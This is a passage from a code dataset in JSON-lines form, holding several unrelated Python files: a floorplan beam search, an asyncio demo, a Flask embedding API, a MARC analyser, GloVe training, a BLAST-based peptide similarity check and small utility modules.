epoch \", epoch_i, \" =======================\")\n start_time = time.time()\n current_candidates = []\n for prev_i in range(len(prev_candidates)):\n prev_ = prev_candidates[prev_i]\n current_candidates.extend(candidate_enumerate(prev_))\n\n print(\"all prev candidate enumerate done.\", \"overall\", len(current_candidates), \"candidates\")\n\n current_candidates = reduce_duplicate_candidate(current_candidates)\n\n print(\"reduce duplicate candidates done.\", \"overall\", len(current_candidates), \"candidates\")\n\n # uncomment to get robust fast score but slower\n #for candidate_i in tqdm(range(len(current_candidates))):\n # evaluator.get_fast_score(current_candidates[candidate_i])\n\n eval_time = time.time()\n evaluator.get_fast_score_list(current_candidates)\n print('average time: {}s/sample'.format((time.time()-eval_time) / len(current_candidates)))\n\n for candidate_i in range(len(current_candidates)):\n if best_candidates[0].graph.graph_score() < current_candidates[candidate_i].graph.graph_score():\n best_candidates = [current_candidates[candidate_i]]\n _best_count = -1\n elif best_candidates[0].graph.graph_score() == current_candidates[candidate_i].graph.graph_score():\n best_candidates.append(current_candidates[candidate_i])\n _best_count = -1\n _best_count += 1\n\n\n print(\"finish evaluating all candidates\")\n\n current_candidates = sorted(current_candidates, key=lambda x:x.graph.graph_score(), reverse=True)\n if len(current_candidates) < beam_width:\n pick = np.arange(len(current_candidates))\n else:\n pick = np.arange(beam_width)\n\n prev_candidates = [current_candidates[_] for _ in pick]\n\n # update safe_count\n for candidate_ in prev_candidates:\n candidate_.update()\n candidate_gallery.append(prev_candidates)\n print(\"========================finish epoch: \", epoch_i, \"=====================================\")\n print(\"spend time: {}s\".format(time.time()-start_time))\n if _best_count == 3:\n break\n\n\n if is_save:\n os.makedirs(save_path, exist_ok=True)\n base_path = os.path.join(save_path, name)\n os.makedirs(base_path, exist_ok=True)\n\n ##################################### GT ############################################\n base_name = 'gt_pred'\n save_candidate_image(gt_candidate, base_path, base_name)\n\n ################################### search ##########################################\n for k in 
range(len(candidate_gallery)):\n current_candidates = candidate_gallery[k]\n for idx, candidate_ in enumerate(current_candidates):\n base_name = 'iter_'+str(k)+'_num_'+str(idx)\n save_candidate_image(candidate_, base_path, base_name)\n\n #################################### best ###########################################\n for k in range(len(best_candidates)):\n candidate_ = best_candidates[k]\n base_name = 'best_'+str(k)\n save_candidate_image(candidate_, base_path, base_name)\n\n ################################ save config ########################################\n data = {}\n # gt\n corner_count = 0\n edge_count = 0\n for ele in gt_candidate.graph.getCorners():\n if ele.get_score() < 0:\n corner_count +=1\n for ele in gt_candidate.graph.getEdges():\n if ele.get_score() < 0:\n edge_count += 1\n data['gt'] = {'score': round(gt_candidate.graph.graph_score(), 2),\n 'corner_score': round(gt_candidate.graph.corner_score(), 2),\n 'edge_score': round(gt_candidate.graph.edge_score(), 2),\n 'region_score': round(gt_candidate.graph.region_score(), 2),\n 'false_corner': corner_count,\n 'false_edge': edge_count}\n\n # pred\n for k in range(len(candidate_gallery)):\n current_candidates = candidate_gallery[k]\n for idx, candidate_ in enumerate(current_candidates):\n corner_count = 0\n edge_count = 0\n for ele in candidate_.graph.getCorners():\n if ele.get_score() < 0:\n corner_count +=1\n for ele in candidate_.graph.getEdges():\n if ele.get_score() < 0:\n edge_count += 1\n data['iter_{}_num_{}'.format(k, idx)] = {'score': round(candidate_.graph.graph_score(), 2),\n 'corner_score': round(candidate_.graph.corner_score(), 2),\n 'edge_score': round(candidate_.graph.edge_score(), 2),\n 'region_score': round(candidate_.graph.region_score(), 2),\n 'false_corner': corner_count,\n 'false_edge': edge_count}\n\n # best\n for idx, candidate_ in enumerate(best_candidates):\n corner_count = 0\n edge_count = 0\n for ele in candidate_.graph.getCorners():\n if ele.get_score() < 0:\n corner_count +=1\n for ele in candidate_.graph.getEdges():\n if ele.get_score() < 0:\n edge_count += 1\n data['best_{}'.format(idx)] = {'score': round(candidate_.graph.graph_score(), 2),\n 'corner_score': round(candidate_.graph.corner_score(), 2),\n 'edge_score': round(candidate_.graph.edge_score(), 2),\n 'region_score': round(candidate_.graph.region_score(), 2),\n 'false_corner': corner_count,\n 'false_edge': edge_count}\n\n np.save(os.path.join(base_path, 'config'), data)\n\n\n\n\n\n","sub_path":"new_search.py","file_name":"new_search.py","file_ext":"py","file_size_in_byte":11441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"21030962","text":"import asyncio, requests\nfrom time import time\n\n\ndef request(n):\n pass\n\nasync def a():\n print('A start')\n for i in range(4):\n print('A', i)\n await asyncio.sleep(3)\n print('A FINISH')\n return\n\n\nasync def b():\n print('B start')\n for i in range(4):\n print('B', i)\n await asyncio.sleep(2)\n print('B FINISH')\n return\n\n\nasync def c():\n print('C start')\n for i in range(4):\n print('C', i)\n await asyncio.sleep(3)\n print('C FINISH')\n return\n\n\nasync def d():\n print('D start')\n for i in range(4):\n print('D', i)\n await asyncio.sleep(1)\n print('D FINISH')\n return\n\nloop = asyncio.get_event_loop()\ntic = time()\nloop.run_until_complete(asyncio.gather(a(), b(), c(), d()))\ntac = time()\nloop.close()\nprint(tac-tic)\n\n\n# from time import time, sleep\n#\n# def a():\n# print('A start')\n# #await asyncio.sleep(3)\n# for i in range(4):\n# print('A', i)\n# sleep(3)\n# print('A FINISH')\n# return\n#\n# def b():\n# print('B start')\n# #await asyncio.sleep(7)\n# for i in range(4):\n# print('B', i)\n# sleep(1)\n# print('B FINISH')\n# return\n#\n# def c():\n# print('C start')\n# #await asyncio.sleep(5)\n# for i in range(4):\n# print('C', i)\n# sleep(5)\n# print('C FINISH')\n# return\n#\n# def d():\n# print('D start')\n# #await asyncio.sleep(3)\n# for i in range(4):\n# print('D', i)\n# sleep(1)\n# print('D FINISH')\n# return\n#\n#\n# tic = time()\n# a()\n# b()\n# c()\n# d()\n# tac = time()\n# print(tac-tic)\n","sub_path":"search/tests/test_a.py","file_name":"test_a.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"476855667","text":"from http import HTTPStatus\n\nfrom flask import Flask\nfrom logging.config import dictConfig\nfrom flask_restplus import Api, Resource, fields\nfrom core.proxy_wrapper import ReverseProxied\nfrom tasks import get_embeddings\n\nimport logging\n\ndictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',\n }},\n 'handlers': {'wsgi': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'default'\n }},\n 'root': {\n 'level': 'DEBUG',\n 'handlers': ['wsgi']\n }\n})\n\n# define app\napp = Flask(__name__)\napp.wsgi_app = ReverseProxied(app.wsgi_app)\napp.logger.setLevel(logging.INFO)\n\n\n# define API\napi = Api(app, version='1.0', title='Embedding API',\n description=\"An API for embedding strings\")\n\n# API for strings\nstrings_model = api.model('Texts', {\n 'texts': fields.List(\n fields.String,\n example=[\n 'Ich bin darüber hocherfreut. Weiter so!',\n 'Nie wieder! Das was absolut schrecklich.'\n ],\n required=True\n ),\n})\n\n\n@api.route('/embed')\nclass StringsEmbedding(Resource):\n @api.expect(strings_model)\n def post(self):\n comment_texts = api.payload.get('texts', [])\n results = get_embeddings(comment_texts)\n return results, HTTPStatus.OK\n\n\n# run app manually\nif __name__ == \"__main__\":\n app.run(threaded=True, port=5060)\n","sub_path":"embedding-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"582693236","text":"from pymarc import MARCReader\nfrom unicode_csv import UnicodeWriter\nimport sys\nfrom pprint import pprint\nfrom tags import meaning\n\ndef _update_analysis(analysis, record_analysis, sample_length):\n # merge this record analysis into the global analysis dict\n \n #first create 'empty' records for all currently known tags\n for tag, stats in analysis.iteritems():\n if not record_analysis.has_key(tag):\n record_analysis[tag] = {\n 'valency': 0,\n 'samples': set(),\n 'subfields': {},\n }\n for subfield in stats['subfields']:\n record_analysis[tag]['subfields'][subfield] = {\n 'valency': 0,\n 'samples': set(), \n }\n \n \n #now merge proper\n for tag, stats in record_analysis.iteritems():\n main_analysis = analysis.get(tag, {\n 'count': 0,\n 'min_valency': sys.maxint,\n 'max_valency': 0,\n 'subfields': {},\n 'samples': set(),\n })\n main_analysis['count'] += stats['valency']\n main_analysis['min_valency'] = min(main_analysis['min_valency'], stats['valency'])\n main_analysis['max_valency'] = max(main_analysis['max_valency'], stats['valency'])\n \n if len(main_analysis['samples']) < sample_length:\n #union the two sets, then clip to the sample length - needs to be a list to do this\n main_analysis['samples'] = set(list(main_analysis['samples'].union(stats['samples']))[:sample_length])\n \n #and now subfields. INCEPTION\n for subfield, substats in stats['subfields'].iteritems():\n main_sub_analysis = main_analysis['subfields'].get(subfield, {\n 'count': 0,\n 'min_valency': sys.maxint,\n 'max_valency': 0,\n 'subfields': {},\n 'samples': set(),\n })\n main_sub_analysis['count'] += substats['valency']\n main_sub_analysis['min_valency'] = min(main_sub_analysis['min_valency'], substats['valency'])\n main_sub_analysis['max_valency'] = max(main_sub_analysis['max_valency'], substats['valency'])\n\n if len(main_sub_analysis['samples']) < sample_length:\n #union the two sets, then clip to the sample length - needs to be a list to do this\n main_sub_analysis['samples'] = set(list(main_sub_analysis['samples'].union(substats['samples']))[:sample_length])\n \n main_analysis['subfields'][subfield] = main_sub_analysis\n \n analysis[tag] = main_analysis\n return analysis\n \n\ndef multifile_iter_records(files, sample_length, analysis={}):\n n = 0\n for f in files:\n if not hasattr(f, 'read'):\n f = open(f)\n reader = MARCReader(f, to_unicode=True)\n for record in reader:\n n += 1\n if n % 1000 == 0:\n sys.stderr.write(\"processed %s records\\n\" % n)\n record_analysis = {}\n\n fields = record.get_fields()\n for field in fields:\n attrdict = record_analysis.get(field.tag, {\n 'valency': 0,\n 'samples': set(),\n 'subfields': {},\n })\n \n attrdict['valency'] += 1\n \n if field.is_control_field():\n if len(attrdict['samples']) < sample_length:\n attrdict['samples'].add(field.data) \n else:\n for subfield in field.get_subfield_tuples():\n key =subfield[0]\n sub_attrdict = attrdict['subfields'].get(key, {\n 'valency': 0,\n 'samples': set(),\n })\n \n sub_attrdict['valency'] += 1\n if len(sub_attrdict['samples']) < sample_length:\n sub_attrdict['samples'].add(subfield[1])\n \n attrdict['subfields'][key] = sub_attrdict\n \n record_analysis[field.tag] = attrdict\n\n analysis = _update_analysis(analysis, record_analysis, sample_length) \n \n return analysis \n\ndef marcanalyse(files, sample_length=5):\n \"\"\"\n returns a csv of marc keys and analysed values, showing, for example, how many records exist.\n \n ================= 
==============================================================\n Column Description\n ================= ==============================================================\n ``tag`` The 3-digit MARC tag.\n ``subfield`` The single-character subfield.\n ``tag_meaning`` The English meaning of the tag/subfield, if known.\n ``record_count`` The number of records that have at least one of these tags.\n ``min_valency`` The minimum number of this tag or subfield that each record has.\n ``max_valency`` The maximum number of this tag or subfield that each record has.\n ``samples`` Non-repeating sample values of the values of each tag or subfield.\n ================= ==============================================================\n\n \"\"\"\n\n analysis = multifile_iter_records(files, sample_length = sample_length)\n \n csv_header=(\"tag\", \"subfield\", \"tag_meaning\", \"record_count\", \"min_valency\", \"max_valency\",\"samples\")\n\n \n writer = UnicodeWriter(sys.stdout)\n writer.writerow(csv_header)\n \n listanalysis = [x for x in analysis.iteritems()]\n listanalysis.sort()\n\n for key, value in listanalysis:\n v = []\n v.append(u'\"%s\"' % key) #tag\n v.append(u\"\") # subfield\n v.append(meaning(key)) #tag_meaning\n v.append(unicode(value['count'])) #record_count\n v.append(unicode(value['min_valency']))\n v.append(unicode(value['max_valency']))\n v.append(u\"\\r\\r\".join(value['samples']))\n writer.writerow(v)\n \n listanalysis = [x for x in value['subfields'].iteritems()]\n listanalysis.sort()\n for subfield, value in listanalysis:\n v = []\n v.append(\"\") #tag\n v.append(subfield) # subfield\n v.append(meaning(key, subfield)) #tag_meaning\n v.append(unicode(value['count'])) #record_count\n v.append(unicode(value['min_valency']))\n v.append(unicode(value['max_valency']))\n v.append(u\"\\r\\r\".join(value['samples']))\n writer.writerow(v)\n \n ","sub_path":"importtools/marctools/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"445676380","text":"#%%\nimport pandas as pd \nimport pickle \nimport re \nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import LancasterStemmer\nimport nltk \nfrom nltk.corpus import stopwords\n\nporter = PorterStemmer()\nlancaster=LancasterStemmer()\n#%%\nfilename=\"svm_bow.sav\"\n\n\n#%%\ndef normalizer_all(tweet):\n tweets = \" \".join(filter(lambda x: x[0]!= '@' , tweet.split()))\n tweets = re.sub('[^a-zA-Z]', ' ', tweets)\n tweets = tweets.lower()\n tweets = tweets.split()\n tweets = [word for word in tweets if not word in set(stopwords.words('english'))]\n tweets =' '.join([porter.stem(w) for w in tweets])\n return tweets\n\nmessage_love=\" I loving man kiss\"\nclean_message=normalizer_all(message_love)\nprint(clean_message)\n\n\n#a=vectorizer.transform([clean_message])\n\n#%%\nbow= pickle.load(open(\"bow.sav\", 'rb'))\na=bow.transform([clean_message])\nsvm_bow= pickle.load(open(\"svm_bow.sav\", 'rb'))\nprint(svm_bow.predict_proba(a.toarray())[0][0])\n\n#%%\na=bow.transform([clean_message])\n\n#%%\nprint(a.shape)\n\n#%%\nsvm_bow= pickle.load(open(\"knn_bow.sav\", 'rb'))\n\n#%%\nsvm_bow.predict_proba(a.toarray())\n\n#%%\na.toarray().shape\n\n#%%\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"512761069","text":"import numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport itertools\nimport random\nimport sys\nimport os\nimport pickle\nfrom collections import defaultdict\n\nclass GloVe(tf.keras.Model):\n def __init__(self, embedding_dim=128, max_vocab_size=100, \n scaling_factor=0.75, batch_size=512, learning_rate=0.01):\n super(GloVe, self).__init__()\n self.embedding_dim = embedding_dim\n self.max_vocab_size = max_vocab_size\n self.scaling_factor = scaling_factor\n self.batch_size = batch_size\n self.vocab_size = 0\n self.concept2id = None\n self.comap = None\n self.comatrix = None\n self.optimizer = tf.keras.optimizers.Adagrad(learning_rate=learning_rate)\n self.epoch_loss_avg = []\n\n def build_dict(self, corpus):\n tokenizer = tf.keras.preprocessing.text.Tokenizer()\n tokenizer.fit_on_texts(corpus)\n self.concept2id = tokenizer.word_index\n self.vocab_size = len(self.concept2id)\n\n def save_dict(self, save_dir):\n with open(save_dir + \"/concept2id.pkl\", \"wb\") as f:\n pickle.dump(self.concept2id, f)\n print(\"concept2id successfully saved in the savedir\")\n \n def fit_to_corpus(self, corpus):\n self.comap = defaultdict(float)\n self.comatrix = np.zeros((len(self.concept2id)+1, len(self.concept2id)+1), dtype=np.float64)\n concept2id = self.concept2id\n\n for i in tqdm(range(len(corpus))):\n patient = corpus[i]\n for p in patient:\n for k in patient:\n if p != k:\n self.comap[(p, k)] += 1\n \n for pair, count in self.comap.items():\n self.comatrix[concept2id[pair[0]], concept2id[pair[1]]] = count\n\n def init_params(self):\n with tf.device(\"/cpu:0\"):\n \"\"\"must be implemented with cpu-only env since this is sparse updating\"\"\"\n self.target_embeddings = tf.Variable(\n tf.random.uniform([self.vocab_size, self.embedding_dim], 0.1, -0.1),\n name=\"target_embeddings\")\n self.context_embeddings = tf.Variable(\n tf.random.uniform([self.vocab_size, self.embedding_dim], 0.1, -0.1),\n name=\"context_embeddings\")\n self.target_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name='target_biases')\n self.context_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name=\"context_biases\")\n\n def compute_cost(self, x):\n \"\"\"x = [target_ind, context_ind, co_occurrence_count]\"\"\"\n target_emb = tf.nn.embedding_lookup([self.target_embeddings], x[0])\n context_emb = tf.nn.embedding_lookup([self.context_embeddings], x[1])\n target_bias = tf.nn.embedding_lookup([self.target_biases], x[0])\n context_bias = tf.nn.embedding_lookup([self.context_biases], x[1])\n\n weight = tf.math.minimum(1.0, \n tf.cast(tf.math.pow(\n tf.math.truediv(x[2], tf.cast(self.max_vocab_size, dtype=tf.float64)), \n self.scaling_factor),\n dtype=tf.float32))\n emb_product = tf.math.reduce_sum(tf.math.multiply(target_emb, context_emb), axis=1)\n # add 1 when calculate log_cooccurrence not to get diverging log\n log_cooccurrence = tf.math.log(tf.add(tf.cast(x[2], dtype=tf.float32), 1))\n \n distance_cost = tf.math.square(\n tf.math.add_n([emb_product, target_bias, context_bias, \n tf.math.negative(log_cooccurrence)])) \n \n batch_cost = tf.math.reduce_sum(tf.multiply(weight, distance_cost)) \n \n return batch_cost\n\n def compute_gradients(self, x):\n with tf.GradientTape() as tape:\n cost = self.compute_cost(x)\n return cost, tape.gradient(cost, self.trainable_variables)\n\n def prepare_batch(self):\n\n i_ids = []\n j_ids = []\n co_occurs = []\n\n for i in range(self.comatrix.shape[0]):\n for j in range(self.comatrix.shape[0]):\n if i == 
j: continue\n i_ids.append(i)\n j_ids.append(j)\n co_occurs.append(self.comatrix[i, j])\n \n assert len(i_ids) == len(j_ids), \"The length of the data are not the same\"\n assert len(i_ids) == len(co_occurs), \"The length of the data are not the same\"\n return i_ids, j_ids, co_occurs\n\n def get_embeddings(self):\n self.embeddings = self.target_embeddings + self.context_embeddings\n \n def save_embeddings(self, save_dir, epoch, avg_loss):\n self.get_embeddings()\n np.save(os.path.join(save_dir, \"glove_emb_e{:03d}_loss{:.4f}.npy\".format(epoch, avg_loss)),\n self.embeddings)\n\n def train_GloVe(self, num_epochs, save_dir, saving_term):\n i_ids, j_ids, co_occurs = self.prepare_batch()\n total_batch = int(np.ceil(len(i_ids) / self.batch_size))\n cost_avg = tf.keras.metrics.Mean()\n self.save_dict(save_dir)\n\n for epoch in range(num_epochs):\n\n progbar = tf.keras.utils.Progbar(len(i_ids))\n\n for i in range(total_batch):\n i_batch = i_ids[i * self.batch_size : (i+1) * self.batch_size]\n j_batch = j_ids[i * self.batch_size : (i+1) * self.batch_size]\n co_occurs_batch = co_occurs[i * self.batch_size : (i+1) * self.batch_size]\n cost, gradients = self.compute_gradients([i_batch, j_batch, co_occurs_batch])\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n cost_avg(cost) \n progbar.add(self.batch_size)\n print(\"Step {}: Loss: {:.4f}\".format(self.optimizer.iterations.numpy(), cost))\n\n if (epoch % 1) == 0: \n avg_loss = cost_avg.result()\n print(\"Epoch {}: Loss: {:.4f}\".format(epoch, avg_loss))\n self.epoch_loss_avg.append(avg_loss)\n \n if (epoch % saving_term) == 0:\n self.save_embeddings(save_dir, epoch, avg_loss)","sub_path":"src/glove.py","file_name":"glove.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"401565201","text":"import csv\nfrom Bio.Blast import NCBIWWW\nfrom Bio.Blast import NCBIXML\nfrom Bio import SeqIO\nimport shutil\nimport re\nimport os\nfrom collections import defaultdict\nfrom time import sleep\n\nclass CalculateReferenceProteomeSimilarity:\n def __init__(self, input_file, input_fasta, output_file, match_length=8, species='human', file_type='vcf'):\n self.input_file = input_file\n self.input_fasta = input_fasta\n self.output_file = output_file\n self.metric_file = \"{}.reference_matches\".format(output_file)\n self.match_length = match_length\n self.species = species\n self.file_type = file_type\n self.species_to_organism = {\n 'human': 'Homo sapiens',\n 'atlantic salmon': 'Salmo salar',\n 'black-headed spider monkey': 'Ateles fusciceps',\n 'blue monkey': 'Cercopithecus mitis',\n 'bonobo': 'Pan paniscus',\n 'bornean orangutan': 'Pongo pygmaeus',\n 'brown-mantled tamarin': 'Saguinus fuscicollis',\n 'chimpanzee': 'Pan troglodytes',\n 'common marmoset': 'Callithrix jacchus',\n 'common squirrel monkey': 'Saimiri sciureus',\n 'cottontop tamarin': 'Saguinus oedipus',\n 'cow': 'Bos taurus',\n 'crab-eating macaque': 'Macaca fascicularis',\n 'dog': 'Canis lupus familiaris',\n \"Geoffroy's tamarin\": 'Saguinus geoffroyi',\n 'golden lion tamarin': 'Leontopithecus rosalia',\n 'gorilla': 'Gorilla gorilla',\n 'grivet': 'Chlorocebus aethiops',\n 'hamadryas baboon': 'Papio hamadryas',\n 'horse': 'Equus caballus',\n 'lar gibbon': 'Hylobates lar',\n 'mouse': 'Mus musculus',\n 'moustached tamarin': 'Saguinus mystax',\n 'olive baboon': 'Papio anubis',\n 'pig': 'Sus scrofa',\n 'rainbow trout': 'Oncorhynchus mykiss',\n 'rhesus macaque': 'Macaca mulatta',\n 'sheep': 'Ovis aries',\n 'southern pig-tailed macaque': 'Macaca nemestrina',\n 'stump-tailed macaque': 'Macaca arctoides',\n 'white-faced saki': 'Pithecia pithecia',\n 'white-fronted spider monkey': 'Ateles belzebuth',\n 'yellow baboon': 'Papio cynocephalus',\n }\n\n def reference_match_headers(self):\n return [\n 'Reference Match',\n ]\n\n def get_mt_peptides(self):\n records = list(SeqIO.parse(self.input_fasta, \"fasta\"))\n if self.file_type == 'vcf':\n records_dict = {x.id.replace('MT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('MT.'), records)}\n else:\n records_dict = {x.id: str(x.seq) for x in records}\n return records_dict\n\n def get_wt_peptides(self):\n if self.file_type == 'vcf':\n records = list(SeqIO.parse(self.input_fasta, \"fasta\"))\n records_dict = {x.id.replace('WT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('WT.'), records)}\n else:\n return {}\n return records_dict\n\n def extract_n_mer(self, full_peptide, subpeptide_position, mutation_position, mt_length):\n #For non-frameshifts this ensures that we only test match_length epitopes that overlap the mutation\n #If we extract a larger region, we will get false-positive matches against the reference proteome\n #from the native wildtype portion of the peptide\n flanking_sequence_length = self.match_length - 1\n mt_start = (subpeptide_position-1) + (mutation_position-1)\n start = mt_start - flanking_sequence_length\n if start < 0:\n start = 0\n end = mt_start + mt_length + flanking_sequence_length\n return full_peptide[start:end]\n\n def extract_n_mer_from_fs(self, full_peptide, wt_peptide, epitope, subpeptide_position):\n #For frameshifts we want to test all downstream epitopes in the flanking region since they are all potentially novel\n flanking_sequence_length = self.match_length - 1\n start = subpeptide_position - 1 - 
flanking_sequence_length\n if start < 0:\n start = 0\n #This catches cases where the start position would cause too many leading wildtype amino acids, which would result\n #in false-positive reference matches\n if len(full_peptide) > len(wt_peptide):\n diff_position = [i for i in range(len(wt_peptide)) if wt_peptide[i] != full_peptide[i]][0]\n else:\n diff_position = [i for i in range(len(full_peptide)) if wt_peptide[i] != full_peptide[i]][0]\n min_start = diff_position - self.match_length + 1 \n if min_start > start:\n start = min_start\n end = start + flanking_sequence_length + len(epitope) + flanking_sequence_length\n return full_peptide[start:end]\n\n def metric_headers(self):\n return ['Chromosome', 'Start', 'Stop', 'Reference', 'Variant', 'Transcript', 'Peptide', 'Hit ID', 'Hit Definition', 'Query Sequence', 'Match Sequence', 'Match Start', 'Match Stop']\n\n def execute(self):\n if self.species not in self.species_to_organism:\n print(\"Species {} not supported for Reference Proteome Similarity search. Skipping.\".format(self.species))\n shutil.copy(self.input_file, self.output_file)\n return\n\n mt_records_dict = self.get_mt_peptides()\n wt_records_dict = self.get_wt_peptides()\n\n with open(self.input_file) as input_fh, open(self.output_file, 'w') as output_fh, open(self.metric_file, 'w') as metric_fh:\n reader = csv.DictReader(input_fh, delimiter=\"\\t\")\n writer = csv.DictWriter(output_fh, delimiter=\"\\t\", fieldnames=reader.fieldnames + self.reference_match_headers(), extrasaction='ignore')\n metric_writer = csv.DictWriter(metric_fh, delimiter=\"\\t\", fieldnames=self.metric_headers(), extrasaction='ignore')\n writer.writeheader()\n metric_writer.writeheader()\n processed_peptides = []\n reference_match_dict = defaultdict(list)\n for line in reader:\n if self.file_type == 'pVACbind':\n epitope = line['Epitope Seq']\n peptide = mt_records_dict[line['Mutation']]\n else:\n epitope = line['MT Epitope Seq']\n if self.file_type == 'vcf':\n if line['Variant Type'] == 'FS':\n peptide = self.extract_n_mer_from_fs(mt_records_dict[line['Index']], wt_records_dict[line['Index']], epitope, int(line['Sub-peptide Position']))\n else:\n mt_amino_acids = line['Mutation'].split('/')[1]\n if mt_amino_acids == '-':\n mt_amino_acids = ''\n peptide = self.extract_n_mer(mt_records_dict[line['Index']], int(line['Sub-peptide Position']), int(line['Mutation Position']), len(mt_amino_acids))\n else:\n peptide = mt_records_dict[line['Index']]\n if peptide not in processed_peptides:\n processed_peptides.append(peptide)\n result_handle = NCBIWWW.qblast(\"blastp\", \"refseq_protein\", peptide, entrez_query=\"{} [Organism]\".format(self.species_to_organism[self.species]), word_size=min(self.match_length, 7), gapcosts='32767 32767')\n for blast_record in NCBIXML.parse(result_handle):\n if len(blast_record.alignments) > 0:\n for alignment in blast_record.alignments:\n for hsp in alignment.hsps:\n matches = re.split('\\+| ', hsp.match)\n for match in matches:\n if len(match) >= self.match_length:\n reference_match_dict[peptide].append({\n 'Hit ID': alignment.hit_id,\n 'Hit Definition': alignment.hit_def,\n 'Query Sequence': hsp.query,\n 'Match Sequence': hsp.match,\n 'Match Start': hsp.sbjct_start,\n 'Match Stop': hsp.sbjct_end,\n })\n sleep(10)\n if peptide in reference_match_dict:\n line['Reference Match'] = True\n metric_line = line.copy()\n metric_line['Peptide'] = peptide\n for alignment in reference_match_dict[peptide]:\n metric_line.update(alignment)\n metric_writer.writerow(metric_line)\n else:\n 
line['Reference Match'] = False\n writer.writerow(line)\n","sub_path":"lib/calculate_reference_proteome_similarity.py","file_name":"calculate_reference_proteome_similarity.py","file_ext":"py","file_size_in_byte":9028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"341444047","text":"import os\nfrom os.path import expanduser\nfrom time import strftime, gmtime, sleep\n\nimport numpy as np\nimport pandas as pd\nimport hashlib\n\nfrom kameleon_rks.tools.log import Log\n\nlogger = Log.get_logger()\n\ndef _create_dir_if_not_exist(fname):\n # create result dir if wanted\n if os.sep in fname:\n try:\n directory = os.sep.join(fname.split(os.sep)[:-1])\n os.makedirs(directory)\n except OSError:\n pass\n\ndef store_samples(samples, fname = expanduser(\"~\") + os.sep + \"results.txt\", **kwargs):\n # add filename if only path is given\n if fname[-1] == os.sep:\n fname += \"results.txt\"\n \n _create_dir_if_not_exist(fname)\n \n # very crude protection against conflicting access from parallel processes\n write_success = False\n while not write_success:\n try:\n # append to file\n f_handle = file(fname, 'a')\n np.savetxt(f_handle, samples)\n f_handle.close()\n write_success = True\n except IOError:\n print(\"IOError writing to %s ... trying again in 1s.\" % fname)\n sleep(1)\n\ndef store_results(fname = expanduser(\"~\") + os.sep + \"results.txt\", **kwargs):\n # add filename if only path is given\n if fname[-1] == os.sep:\n fname += \"results.txt\"\n \n _create_dir_if_not_exist(fname)\n \n # use current time as index for the dataframe\n current_time = strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime())\n new_df = pd.DataFrame([[kwargs[k] for k in kwargs.keys()]], index=[current_time],columns=kwargs.keys())\n \n if os.path.exists(fname):\n df = pd.read_csv(fname, index_col=0)\n df = df.append(new_df)\n else:\n df = new_df\n\n # very crude protection against conflicting access from parallel processes\n write_success = False\n while not write_success:\n try:\n df.to_csv(fname)\n write_success = True\n except IOError:\n print(\"IOError writing to csv ... trying again in 1s.\")\n sleep(1)\n \ndef assert_file_has_sha1sum(fname, sha1_reference):\n sha1 = sha1sum(fname)\n if not sha1 == sha1_reference:\n raise RuntimeError(\"File %s has sha1sum %s which is different from the provided reference %s\" % \\\n (fname, sha1, sha1_reference))\n\ndef sha1sum(fname, blocksize=65536):\n \"\"\"\n Computes sha1sum of the given file. Same as the unix command line hash.\n \n Returns: string with the hex-formatted sha1sum hash\n \"\"\"\n hasher = hashlib.sha1()\n with open(fname, 'rb') as afile:\n logger.debug(\"Hashing %s\" % fname)\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(blocksize)\n return hasher.hexdigest()\n","sub_path":"kameleon_rks/experiments/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"36171400","text":"#\n# Copyright (c) 2008-2015 Thierry Florac \n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n\n__docformat__ = 'restructuredtext'\n\n\n# import standard library\n\n# import interfaces\n\n# import packages\nfrom babel.core import Locale\nfrom babel.numbers import format_decimal\nfrom pyams_utils.request import check_request\n\nfrom pyams_utils import _\n\n\ndef get_human_size(value, request=None):\n \"\"\"Convert given bytes value in human readable format\n\n >>> from pyramid.testing import DummyRequest\n >>> request = DummyRequest(params={'_LOCALE_': 'fr'})\n >>> request.locale_name\n 'fr'\n\n >>> from pyams_utils.size import get_human_size\n >>> get_human_size(256, request)\n '256 bytes'\n >>> get_human_size(3678, request)\n '3,6 Kb'\n >>> get_human_size(6785342, request)\n '6,47 Mb'\n >>> get_human_size(3674815342, request)\n '3,422 Gb'\n \"\"\"\n if request is None:\n request = check_request()\n translate = request.localizer.translate\n locale = Locale(request.locale_name)\n if value < 1024:\n return format_decimal(value, translate(_('0 